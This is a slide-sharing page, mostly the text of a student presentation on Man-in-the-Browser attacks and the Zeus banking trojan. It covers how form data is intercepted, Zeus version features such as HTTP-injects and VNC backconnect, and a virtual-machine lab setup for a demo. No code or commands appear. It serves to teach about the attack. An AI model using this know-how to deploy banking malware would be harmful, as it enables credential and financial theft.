The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 

Man In The Browser

  • 1. Man-In-The-Browser Aras Tarhan Manos Dimogerontakis Mário Almeida Umit Buyuksahin
  • 2. OUTLINE ● Man-in-the-Browser Attack ● Method of Attack ● Banking Trojans ● Zeus ● Zeus Installation ● Zeus Configuration Files ● DEMO
  • 3. Man-in-the-Browser Attack ● Online phishers steal money from online customers ● Online customers become target with more advanced methods ● One of the latest and most dangerous is Man-in-the- Browser. ● The malicious code modifies actions performed by the computer users. ● Then, steals confidential information ● These attacks can not be detected by the user
  • 4. Method of Attack ● The trojan installs an extension into the browser configuration ● Whenever a page is loaded, the URL of the page is searched by the extension against a list of known sites targeted for attack. ● When the handler detects a page-load for a specific pattern in its targeted list. ● When the submit button is pressed, the extension extracts all data from all form fields.
  • 5. Method of Attack (2) ● The browser sends the form including the modified values to the server. ● The server receives the modified values in the form as normal request. ● The server performs the transaction and generates a receipt. ● The browser receives the receipt for the modified transaction and displays the modified receipt with the original details.
  • 6. Banking Trojans A number of Trojan families are used to conduct MITB attacks. Some MITB Trojans are so advanced that they have streamlined the process for committing fraud, programmed with functionality to fully automate the process from infection to cash out. Some known banking trojans: ● Zeus ● Sinowal (Torpig) ● SpyEye ● Carberp ● Feodo ● Tatanga ● ...
  • 7. ZEUS ● aim is to steal credentials of the victim ● steals banking information by using Key Stroke Logging and form grabbing methods ● first appearance 2007, become widespread 2009 ( about 3.6 million in US ) ● targets only Microsoft Windows OS ● used version: 2.0.8.9
  • 8. Evolution of ZEUS ● Version 2.0.0.0, 01.04.2010 ○ full compatible with previous versions ○ the installation process in the system was re-written to send reports to the Control panel ○ valuable work with x32 applications in Windows x64 ○ the name of the botnet is limited to 20 characters and can contain any international characters ○ complete (as with wininet.dll) to work with nspr4.dll, but without HTTP-fakes ○ the configuration file is read in UTF-8 encoding
  • 9. Evolution of ZEUS ● Version 2.0.1.0, 28.04.2010 ○ modified to bind to the user/OS ○ minor improvements to HTTP-injects ● Version 2.0.2.0, 10.05.2010 ○ forced change of Mozilla Firefox security settings for normal HTTP-injects ● Version 2.0.3.0, 19.05.2010 ○ in the configuration file, ■ added the option "StaticConfig.disable_tcpserver" ■ added the option "StaticConfig.remove_certs" ○ in control panel, fixed a bug in the module "Botnet-> Bots"
  • 10. Evolution of ZEUS ● Version 2.0.5.0, 08.06.2010 ○ fixed minor bugs in HTTP-grabber ● Version 2.0.6.0, 22.06.2010 ○ fixed an error resuting in disabling HTTP-injects ● Version 2.0.8.0, 17.08.2010 ○ to the parameters HTTP-injects was added a new option "I" (compare URL insensitive) and "C" (comparison of context insensitive) ● Version 2.1.0.0, 20.03.2011 ○ RDP + VNC BACKCONNECT added to connect remotely to the victim
  • 11. Zeus - Capabilities ● gets OS info ● does other things done by botnet scripts (like reboot, shutdown, log off and kill OS) ● takes screenshot ● sends a script to be executed ● searches files ● all orders and states of them can be viewed on a control panel in the server
  • 12. Used Environments ● Virtual Machine ○ to add a significant layer of security and safety ○ both Server and Client to be hacked are installed on distinct Virtual Machines ○ used program: VirtualBox 4.1.6 for Windows hosts, Oracle ○ each of them has two network adaptors, Host-only to communicate between them and NAT for outside internet access ● Operating System ○ used program: Windows XP Service Pack 3, Microsoft ○ since Zeus we get is able to be builded on Windows
  • 13. Used Environments ● Server and Database ○ to manage bots inside victims ○ to receive the information from bots running on infected clients ○ to store the targeted data about the victim ○ used program: XAMPP 1.7.7 including ■ Apache 2.2.21 ■ MySQL 5.5.16 ■ PHP 5.3.8 ■ phpMyAdmin 3.4.5
  • 15. Demo